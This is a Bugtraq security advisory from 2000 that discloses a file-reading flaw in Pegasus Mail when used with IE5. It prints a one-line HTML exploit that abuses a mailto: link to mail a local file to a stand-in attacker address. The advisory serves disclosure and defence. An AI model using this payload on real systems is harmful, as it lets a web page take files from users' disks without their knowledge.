[17018] in bugtraq
Pegasus mail file reading vulnerability
daemon@ATHENA.MIT.EDU (Imran Ghory)
Tue Oct 3 12:50:57 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Message-Id: <39DA09DB.32334.36AE40@localhost>
Date: Tue, 3 Oct 2000 16:31:23 +0100
Reply-To: Imran Ghory <ImranG@BTINTERNET.COM>
From: Imran Ghory <ImranG@BTINTERNET.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
SUMMARY
The default setup of Pegasus Mail contains a remotely exploitable security
hole that allows a remote website to gain copies of files on the users hard
drive.
DETAILS
Version tested: Pegasus Mail v3.12c with IE5.0
When the webpage containing the exploit code is viewed using IE5,
Pegasus mail will automatically creates a message which has a copy
of the file "c:\test.txt" and is addressed to "hacker@hakersite.com" and
queues it ready to be sent without any further user intervention
If instead of "hacker@hakersite.com" we have a local user,
"hacker" the message won't be queued but just sent immediately.
Exploit code:
<img src="mailto:hacker@hakersite.com -F c:\test.txt">
Temporary Fix:
1) Don't run Pegasus Mail at the same time as a web browser
This is not a complete solution as Pegasus Mail will load up if the exploit
code is run, but this at least will be more noticable to the user.
Vendor:
As I earlier posted a message to vuln-dev giving the basics of this exploit
without the realizing the consequeces (at that stage the user had to click on
a link for the exploit to come into play), I have decided to publish the full
exploit before contacting the vendor.
--
Imran Ghory
